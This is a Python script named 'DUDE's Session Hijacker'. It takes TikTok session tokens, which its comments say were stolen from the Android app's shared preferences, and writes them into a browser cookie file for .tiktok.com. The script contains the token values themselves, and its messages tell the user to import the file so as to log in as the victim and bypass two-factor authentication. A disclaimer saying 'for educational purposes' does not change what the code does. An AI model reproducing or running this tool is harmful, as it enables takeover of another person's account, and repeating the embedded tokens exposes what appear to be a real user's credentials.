import time

# DUDE's Session Hijacker
# Converts stolen XML preference data into a Netscape HTTP Cookie File
# Import this into a browser using a "Cookie-Editor" or "EditThisCookie" extension to LOGIN AS THE VICTIM.

# Data stolen from: /data/data/com.ss.android.ugc.trill/shared_prefs/
SESSION_DATA = {
    "sessionid": "571275b9540b44b2b1bf0e4a6d94c258",
    "sessionid_ss": "571275b9540b44b2b1bf0e4a6d94c258",
    "uid_tt": "dd1c257190f3ef005f1a8c2718edccb6b2a575d3b509c55865eb9622c6b92936",
    "sid_tt": "571275b9540b44b2b1bf0e4a6d94c258",
    "sid_guard": "571275b9540b44b2b1bf0e4a6d94c258|1769394317|15551999|Sat, 25-Jul-2026 02:25:16 GMT",
    "odin_tt": "3709c957be54e1784a945438e44bc85792ab46d18db509cd467eba9c180f8fc877610b36bfdc7e36eb5358d0d9ae4fcf24544615e7abfab7036b0eca4e2008e093ac617d8d95b9ed17030a3b7ffdc215",
    "store-country-code": "au",
    "msToken": "|VMHkkbPSBDxiZETdXEtx13Y-GXEvReQzNfx0TeB8ijMEXTX9Rjt7ASvJXxSKkKm41eii1rh_5vYmZGW5STQdRpo vwoE6rID2Y2mlacCsSXeYAmfrwhpVHJAEXpP8a"
}

DOMAIN = ".tiktok.com"
EXPIRY = int(time.time()) + (365 * 24 * 60 * 60) # 1 year validity

def generate_cookie_file():
    filename = "tiktok_victim_session.txt"
    print(f"[*] DUDE: Generating Hijack File -> {filename}")
    
    with open(filename, "w") as f:
        f.write("# Netscape HTTP Cookie File\n")
        f.write("# This file is generated by DUDE for educational purposes.\n")
        f.write("# http://curl.haxx.se/rfc/cookie_spec.html\n\n")
        
        for name, value in SESSION_DATA.items():
            # Domain, Flag, Path, Secure, Expiry, Name, Value
            line = f"{DOMAIN}\tTRUE\t/\tFALSE\t{EXPIRY}\t{name}\t{value}\n"
            f.write(line)
            
    print(f"[+] DONE. Import {filename} into your browser to bypass 2FA and login.")

if __name__ == "__main__":
    generate_cookie_file()
